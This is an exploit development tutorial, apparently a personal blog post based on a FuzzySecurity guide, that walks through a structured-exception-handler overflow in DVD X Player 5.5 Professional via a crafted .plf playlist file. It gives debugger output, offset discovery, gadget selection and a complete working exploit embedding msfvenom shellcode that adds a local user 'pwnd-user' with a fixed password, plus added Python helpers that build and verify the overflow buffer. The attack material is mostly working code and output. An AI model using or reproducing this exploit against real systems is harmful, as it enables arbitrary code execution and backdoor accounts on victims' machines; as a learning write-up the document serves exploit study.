Before we get started, I must state clearly that this information is based on the guidance provided on the fuzzysecurity.com website, as shown in the references section.
For some folks, reading my material may be easier; for others, reading the material from FuzzySecurity will be easier. Whichever you choose, please note that this is all based on the guidance provided by those folks and thus nothing here is my original work.
Similar to the FuzzySecurity blog post, we will be using DVD X Player 5.5 Professional.
First up, generate the playlist file (".plf") that overruns the buffer. The code below creates a file of 2000 "A" bytes for that purpose.
def Exploit_Code():
    malicious_file = 'SecurityNik.plf'
    myBuffer = 'A' * 2000          # 2000 bytes of 0x41, enough to overrun the buffer

    fp = open(malicious_file, 'w')
    fp.write(myBuffer)
    fp.close()
    print(' File {!s} created ... '.format(malicious_file))

if __name__ == '__main__':
    Exploit_Code()
Once the file is created and opened in DVD X Player with the debugger attached, we get:
(488.164): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000001 ebx=77f6c19c ecx=042c0a60 edx=00000042 esi=042c0180 edi=6405362c
eip=41414141 esp=0012f104 ebp=00effd80 iopl=0         nv up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010216
41414141 ?? ???
From above we see that EIP has been overwritten with "41414141", which is our As (0x41). EIP itself is controlled here too, but this post follows the SEH overwrite, since the same buffer also clobbers the exception handler chain.
If we take a look at our "!exchain", we see our Next SEH and SE Handler have been overwritten with "41414141"
0:000> !exchain
0012f24c: 41414141
Invalid exception stack at 41414141
Further confirming the above, if we look at the Thread Information Block (TIB) at fs:[0], whose first DWORD is the head of the SEH chain (the address of the first EXCEPTION_REGISTRATION_RECORD), we see:
0:000> d fs:[0]
003b:00000000  4c f2 12 00 00 00 13 00-00 80 12 00 00 00 00 00  L...............
003b:00000010  00 1e 00 00 00 00 00 00-00 e0 fd 7f 00 00 00 00  ................
003b:00000020  88 04 00 00 64 01 00 00-00 00 00 00 00 00 00 00  ....d...........
003b:00000030  00 f0 fd 7f 00 00 00 00-00 00 00 00 00 00 00 00  ................
003b:00000040  60 9c db e1 00 00 00 00-00 00 00 00 00 00 00 00  `...............
003b:00000050  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
003b:00000060  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
003b:00000070  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
The first four bytes, 4c f2 12 00, are the little-endian pointer 0x0012f24c. When we dump the contents of that address we get:
0:000> d 0012f24c
0012f24c  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0012f25c  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0012f26c  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0012f27c  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0012f28c  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0012f29c  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0012f2ac  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0012f2bc  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
At this point we see that both the Next SEH pointer and the SE Handler have been overwritten.
Leveraging our trusted "pattern_create.rb" to generate a unique pattern of 2000 bytes, and placing it in the code, we get:
root@kali:/usr/share/metasploit-framework/tools/exploit# ./pattern_create.rb --length 2000
and the modified code:
def Exploit_Code():
    malicious_file = 'SecurityNik.plf'
    # 2000-byte output of pattern_create.rb in place of the As
    myBuffer = 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co'

    fp = open(malicious_file, 'w')
    fp.write(myBuffer)
    fp.close()
    print(' File {!s} created ... '.format(malicious_file))

if __name__ == '__main__':
    Exploit_Code()
When the new file is fed to DVDX we get:
(46c.2a4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000001 ebx=77f6c19c ecx=03e80a60 edx=00000042 esi=03e80180 edi=6405362c
eip=37694136 esp=0012f104 ebp=00effd80 iopl=0         nv up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010216
37694136 ?? ???
Looking at the "!exchain" output we get:
0:000> !exchain
0012f24c: 41347541
Invalid exception stack at 33754132
The first value, 0x41347541, is the SE Handler; the "Invalid exception stack at 33754132" line is the Next SEH pointer, so that is the one we locate in the pattern. WinDbg prints it as a DWORD read from memory, and x86 stores DWORDs little-endian, so the bytes in memory are 32 41 75 33. Reversing the byte order, to 0x32417533, makes ".formats" print those bytes in the same order they appear in the pattern.
When this value is fed to WinDbg's ".formats" we see the following output:
0:000> .formats 0x32417533
Evaluate expression:
  Hex:     32417533
  Decimal: 843150643
  Octal:   06220272463
  Binary:  00110010 01000001 01110101 00110011
  Chars:   2Au3
  Time:    Thu Sep 19 12:30:43 1996
  Float:   low 1.12607e-008 high 0
  Double:  4.16572e-315
When "2Au3" is fed to Metasploit's "pattern_offset.rb" we get:
root@kali:/usr/share/metasploit-framework/tools/exploit# ./pattern_offset.rb --length 2000 --query 2Au3
[*] Exact match at offset 608
At this point we can conclude that our Next SEH pointer is at offset 608. This means our SE Handler is at offset 612, since it is the second 4-byte field of the registration record, immediately after the Next SEH pointer. (As a cross-check, the handler value 0x41347541 is the bytes "Au4A", which sit at offset 612 in the pattern.)
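The lookup just done by hand (pattern_create.rb, reading the DWORD out of "!exchain", reversing its byte order, ".formats", pattern_offset.rb) is short enough to script. The following is an added example, not the post's or FuzzySecurity's code: it regenerates the same Metasploit-style pattern in Python and resolves a DWORD exactly as WinDbg prints it, by packing it little-endian, so the byte-order reversal is not done by hand. The only inputs are the values taken from the debugger output above; nothing else is assumed.

```python
# Added example: Python equivalent of pattern_create.rb / pattern_offset.rb,
# including the little-endian handling the post does by hand with ".formats".
import itertools
import struct

UPPER = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
LOWER = "abcdefghijklmnopqrstuvwxyz"
DIGIT = "0123456789"


def pattern_create(length):
    """Same sequence as Metasploit's pattern_create.rb: Aa0Aa1...Aa9Ab0...,
    every 3-byte triplet unique, truncated to `length` characters."""
    out = []
    for upper, lower, digit in itertools.product(UPPER, LOWER, DIGIT):
        if len(out) * 3 >= length:
            break
        out.append(upper + lower + digit)
    return "".join(out)[:length]


def dword_to_memory_bytes(value):
    """A DWORD as WinDbg prints it (e.g. 33754132) is stored little-endian,
    so in memory it is the bytes 32 41 75 33, i.e. b'2Au3'. This is what
    the post achieves by reversing 0x33754132 to 0x32417533 for .formats."""
    return struct.pack("<I", value)


def pattern_offset(pattern, query):
    """Offset of `query` in the pattern, or -1. `query` may be the 4
    characters .formats showed, raw bytes, or the DWORD from the register
    dump / !exchain output."""
    if isinstance(query, int):
        query = dword_to_memory_bytes(query).decode("latin-1")
    elif isinstance(query, bytes):
        query = query.decode("latin-1")
    return pattern.find(query)


def seh_offsets(length, next_seh_dword, handler_dword):
    """Offsets of the Next SEH pointer and the SE Handler for one crash.
    The handler must land 4 bytes after the Next SEH pointer; if it does
    not, the record was not overwritten by one contiguous copy."""
    pattern = pattern_create(length)
    nseh = pattern_offset(pattern, next_seh_dword)
    handler = pattern_offset(pattern, handler_dword)
    if nseh < 0 or handler != nseh + 4:
        raise ValueError("SEH record not contiguous: nseh=%d handler=%d" % (nseh, handler))
    return nseh, handler


if __name__ == "__main__":
    # Values from the !exchain and register output in the post.
    print(seh_offsets(2000, next_seh_dword=0x33754132, handler_dword=0x41347541))
    print(pattern_offset(pattern_create(2000), 0x37694136))  # the EIP value
```

pattern_offset.rb itself also accepts the raw 8-hex-digit DWORD (`--query 33754132`) and does the little-endian conversion for you, so the ".formats" step is a visual aid rather than a requirement. Running the block also shows that the EIP value from the crash, 0x37694136, sits in the same pattern, which is why the direct EIP overwrite would have been an option too.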
Leveraging "findjmp2.exe" to identify a pop pop return sequence, we get:
C:\Program Files\Aviosoft\DVD X Player 5.5 Professional>e:\findjump2.exe EPG.dll eax | findstr /i pop
0x61625534 pop eax - pop - retbis
0x61629759 pop eax - pop - ret
0x6162E7A6 pop eax - pop - ret
0x6162F5F2 pop eax - pop - ret
0x61632B3B pop eax - pop - retbis
0x61632DDA pop eax - pop - ret
0x616339BB pop eax - pop - retbis
0x616339DD pop eax - pop - retbis
0x61633F3B pop eax - pop - retbis
0x616347E5 pop eax - pop - ret
0x616348C9 pop eax - pop - retbis
0x61636E07 pop eax - pop - retbis
0x616384EE pop eax - pop - retbis
0x61638890 pop eax - pop - ret
0x6163A654 pop eax - pop - ret
0x6163AB3E pop eax - pop - ret
0x6163B482 pop eax - pop - ret
0x6163B9EE pop eax - pop - retbis
0x6163E206 pop eax - pop - ret
0x6163E54F pop eax - pop - retbis
0x61641D08 pop eax - pop - ret
0x61642270 pop eax - pop - retbis
0x61642A8E pop eax - pop - ret
0x61643B6B pop eax - pop - ret
0x61643BAD pop eax - pop - retbis
0x61643CCC pop eax - pop - retbis
0x61643D73 pop eax - pop - retbis
0x6164526D pop eax - pop - retbis
We select the entry at 0x61629759. Two things matter in this choice: the module supplying the pop pop ret must have been built without SafeSEH, otherwise the loader's handler table would reject the address before it is ever called, and the address itself must contain none of the bad characters used below (0x61, 0x62, 0x97 and 0x59 are all fine).
Now that we have everything set, we generate a payload that adds a user to the system. This user will be named "pwnd-user".
Let's first do a "net user" to verify this user does not exist.
C:\>net user

User accounts for \\SECURITYNIK-XP

-------------------------------------------------------------------------------
Administrator            Guest                    HelpAssistant
SecurityNik              SUPPORT_388945a0
The command completed successfully.
Time for the final code:
"""
This code is part of me learning exploit development in a Windows Environment
Author: Nik Alleyne
Author Blog: http://securitynik.blogspot.com
Date: 2018-01-10
Exploit is for DVDX Player 5.5 Professional
"""

def Exploit_Code():
    malicious_file = 'SecurityNik.plf'

    # root@kali:~# msfvenom --platform Windows --arch x86 --payload windows/exec CMD="net user pwnd-user Password1 /add" --smallest --encoder x86/shikata_ga_nai --bad-chars '\x00\x0A\x0D\x1A' --format c --iterations 1 > msfvenom_add_user.txt
    # Bytes literals so the payload is written out unchanged on Python 3 as well as Python 2.
    shellcode = (
        b"\xba\x2d\x45\x8d\x97\xd9\xcf\xd9\x74\x24\xf4\x5f\x2b\xc9\xb1"
        b"\x37\x31\x57\x14\x03\x57\x14\x83\xc7\x04\xcf\xb0\x71\x7f\x8d"
        b"\x3b\x8a\x80\xf1\xb2\x6f\xb1\x31\xa0\xe4\xe2\x81\xa2\xa9\x0e"
        b"\x6a\xe6\x59\x84\x1e\x2f\x6d\x2d\x94\x09\x40\xae\x84\x6a\xc3"
        b"\x2c\xd6\xbe\x23\x0c\x19\xb3\x22\x49\x47\x3e\x76\x02\x0c\xed"
        b"\x67\x27\x58\x2e\x03\x7b\x4d\x36\xf0\xcc\x6c\x17\xa7\x47\x37"
        b"\xb7\x49\x8b\x4c\xfe\x51\xc8\x68\x48\xe9\x3a\x07\x4b\x3b\x73"
        b"\xe8\xe0\x02\xbb\x1b\xf8\x43\x7c\xc3\x8f\xbd\x7e\x7e\x88\x79"
        b"\xfc\xa4\x1d\x9a\xa6\x2f\x85\x46\x56\xfc\x50\x0c\x54\x49\x16"
        b"\x4a\x79\x4c\xfb\xe0\x85\xc5\xfa\x26\x0c\x9d\xd8\xe2\x54\x46"
        b"\x40\xb2\x30\x29\x7d\xa4\x9a\x96\xdb\xae\x37\xc3\x51\xed\x5d"
        b"\x12\xe7\x8b\x10\x14\xf7\x93\x04\x7c\xc6\x18\xcb\xfb\xd7\xca"
        b"\xaf\xf3\x9d\x57\x99\x9b\x7b\x02\x9b\xc6\x7b\xf8\xd8\xfe\xff"
        b"\x09\xa1\x05\x1f\x78\xa4\x42\xa7\x90\xd4\xdb\x42\x97\x4b\xdc"
        b"\x46\xf9\x0e\x56\x49\x73\xa2\xf3\xfb\x5b\x34\x8c\x95\xff\x99"
        b"\x07\x19\x65\x90\xc7\x8d\x04\x27\x74\x59\xa8\xb5\x1e\x94\x16"
        b"\x15\xbf\xb2\x32\x69")

    # Layout:
    #   608 bytes of padding up to the Next SEH pointer
    #   Next SEH   = jmp short +6 (over the handler address) padded with two NOPs
    #   SE Handler = pop pop ret at 0x61629759 in EPG.DLL, little-endian
    #   20-byte NOP sled, then the shellcode
    myBuffer = (b'A' * 608
                + b'\xeb\x06\x90\x90'
                + b'\x59\x97\x62\x61'
                + b'\x90' * 20
                + shellcode)

    # Binary mode: text mode could translate or re-encode bytes and corrupt the payload.
    fp = open(malicious_file, 'wb')
    fp.write(myBuffer)
    fp.close()
    print(' File {!s} created ... '.format(malicious_file))

if __name__ == '__main__':
    Exploit_Code()
Once the created file is fed to DVDX Player, the application showed a few errors. However, in the background our user "pwnd-user" was created.
C:\>net user

User accounts for \\SECURITYNIK-XP

-------------------------------------------------------------------------------
Administrator            Guest                    HelpAssistant
pwnd-user                SecurityNik              SUPPORT_388945a0
The command completed successfully.
At this point the post could end. However, let's take a quick last pass to get a better understanding of what transpired.
First, attach the debugger to DVD X Player, then feed it the file. Once it crashes, we get:
(288.7a0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000001 ebx=77f6c19c ecx=03f50a60 edx=00000042 esi=03f50180 edi=6405362c
eip=41414141 esp=0012f104 ebp=00effd80 iopl=0         nv up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010216
41414141 ?? ???
Next up, let's look at the TIB "fs:[0]" to see where the SE Chain starts:
0:000> d fs:[0]
003b:00000000  4c f2 12 00 00 00 13 00-00 80 12 00 00 00 00 00  L...............
003b:00000010  00 1e 00 00 00 00 00 00-00 f0 fd 7f 00 00 00 00  ................
003b:00000020  88 02 00 00 a0 07 00 00-00 00 00 00 00 00 00 00  ................
003b:00000030  00 b0 fd 7f 00 00 00 00-00 00 00 00 00 00 00 00  ................
003b:00000040  b8 44 da e1 00 00 00 00-00 00 00 00 00 00 00 00  .D..............
003b:00000050  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
003b:00000060  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
003b:00000070  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
From the above, we see the chain starts at "0x0012f24c"
Dumping the memory at this location, we get:
0:000> d 0012f24c
0012f24c  eb 06 90 90 59 97 62 61-90 90 90 90 90 90 90 90  ....Y.ba........
0012f25c  90 90 90 90 90 90 90 90-90 90 90 90 ba 2d 45 8d  .............-E.
0012f26c  97 d9 cf d9 74 24 f4 5f-2b c9 b1 37 31 57 14 03  ....t$._+..71W..
0012f27c  57 14 83 c7 04 cf b0 71-7f 8d 3b 8a 80 f1 b2 6f  W......q..;....o
0012f28c  b1 31 a0 e4 e2 81 a2 a9-0e 6a e6 59 84 1e 2f 6d  .1.......j.Y../m
0012f29c  2d 94 09 40 ae 84 6a c3-2c d6 be 23 0c 19 b3 22  -..@..j.,..#..."
0012f2ac  49 47 3e 76 02 0c ed 67-27 58 2e 03 7b 4d 36 f0  IG>v...g'X..{M6.
0012f2bc  cc 6c 17 a7 47 37 b7 49-8b 4c fe 51 c8 68 48 e9  .l..G7.I.L.Q.hH.
From above we see the Next SEH pointer overwritten with 0x909006eb, that is, the bytes eb 06 90 90: a short jump of 6 bytes, which skips the 4-byte handler address and lands on the NOPs. This is followed by the SE Handler overwritten with 0x61629759, our pop pop ret in EPG.dll. Next come our NOPs (0x90) followed by our shellcode. When the exception is dispatched, the handler at 0x61629759 runs, its two pops discard two DWORDs from the stack and the ret lands on the address of the registration record itself, which is the Next SEH field, so the jmp short executes, then the NOP sled, then the shellcode.
We can also verify that the Next SEH pointer and SE Handler have been overwritten by leveraging the "!exchain" extension, as shown below:
0:000> !exchain
0012f24c: *** WARNING: Unable to verify checksum for C:\Program Files\Aviosoft\DVD X Player 5.5 Professional\EPG.dll
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Aviosoft\DVD X Player 5.5 Professional\EPG.dll -
EPG!Ordinal1+23919 (61629759)
Invalid exception stack at 909006eb
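The layout the debugger confirms above can also be checked offline before the file is ever handed to the player. The following is an added example, not part of the original post: it rebuilds the buffer from the post's offset (608), its pop pop ret (0x61629759) and its bad-character set, reads the overwritten registration record back the way "!exchain" and "d" show it, decodes the short jump in the Next SEH field to confirm it lands on the NOP sled, and scans everything from the record onward for bad characters. The shellcode used here is a constructed stand-in (INT3 breakpoints), not the msfvenom payload from the post.

```python
# Added example: build the SEH overwrite buffer and verify its layout
# offline, using the values established in the post.
import struct

NSEH_OFFSET = 608                   # from pattern_offset.rb
PPR_ADDR = 0x61629759               # pop pop ret in EPG.dll (findjmp2 output)
BAD_CHARS = b"\x00\x0a\x0d\x1a"     # the --bad-chars set given to msfvenom

# Constructed stand-in for the msfvenom payload: INT3s, so a debugger would
# break as soon as control reaches the shellcode. Not the post's shellcode.
DUMMY_SHELLCODE = b"\xcc" * 32


def build_buffer(shellcode, nseh_offset=NSEH_OFFSET, ppr=PPR_ADDR, nops=20):
    """Padding, Next SEH (jmp short +6 over the handler), SE Handler
    (little-endian), NOP sled, shellcode: the layout from the post."""
    nseh = b"\xeb\x06\x90\x90"
    handler = struct.pack("<I", ppr)
    return b"A" * nseh_offset + nseh + handler + b"\x90" * nops + shellcode


def parse_seh_record(buf, nseh_offset=NSEH_OFFSET):
    """Read the overwritten EXCEPTION_REGISTRATION_RECORD back as two
    little-endian DWORDs, exactly as !exchain / d fs:[0] present them."""
    nseh = struct.unpack_from("<I", buf, nseh_offset)[0]
    handler = struct.unpack_from("<I", buf, nseh_offset + 4)[0]
    return nseh, handler


def short_jmp_target(buf, at):
    """Decode 'EB rel8' at buf[at]; returns the buffer offset it lands on.
    rel8 is signed and relative to the end of the 2-byte instruction."""
    if buf[at] != 0xEB:
        raise ValueError("no short jmp at offset %d" % at)
    rel = struct.unpack_from("<b", buf, at + 1)[0]
    return at + 2 + rel


def find_bad_chars(data, bad=BAD_CHARS):
    """Offsets in `data` holding a bad character."""
    return [i for i, b in enumerate(data) if b in bad]


def check_layout(buf, nseh_offset=NSEH_OFFSET, ppr=PPR_ADDR):
    """The checks a practitioner wants before firing: handler address is the
    chosen gadget, the jmp lands on the first NOP right after the handler,
    and nothing from the record onward contains a bad character."""
    nseh, handler = parse_seh_record(buf, nseh_offset)
    landing = short_jmp_target(buf, nseh_offset)
    bad = [nseh_offset + i for i in find_bad_chars(buf[nseh_offset:])]
    return {
        "nseh": nseh,
        "handler": handler,
        "handler_ok": handler == ppr,
        "lands_on_nop": landing == nseh_offset + 8 and buf[landing] == 0x90,
        "bad_char_offsets": bad,
    }


def write_plf(path, buf):
    """Binary mode: text mode could translate bytes and corrupt the payload."""
    with open(path, "wb") as fp:
        fp.write(buf)


if __name__ == "__main__":
    buf = build_buffer(DUMMY_SHELLCODE)
    result = check_layout(buf)
    print("nseh=%08x handler=%08x" % (result["nseh"], result["handler"]))
    print("handler_ok=%s lands_on_nop=%s bad=%s"
          % (result["handler_ok"], result["lands_on_nop"], result["bad_char_offsets"]))
    if result["handler_ok"] and result["lands_on_nop"] and not result["bad_char_offsets"]:
        write_plf("SecurityNik-check.plf", buf)
```

With the post's values the record reads back as nseh=909006eb and handler=61629759, matching the "!exchain" output above, and the jump decodes to offset 616, the first NOP. Swap in a real payload and the bad-character scan is the step that catches an encoder run with the wrong --bad-chars before it silently truncates in the player.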
That's it for this post.
References:
https://www.fuzzysecurity.com/tutorials/expDev/3.html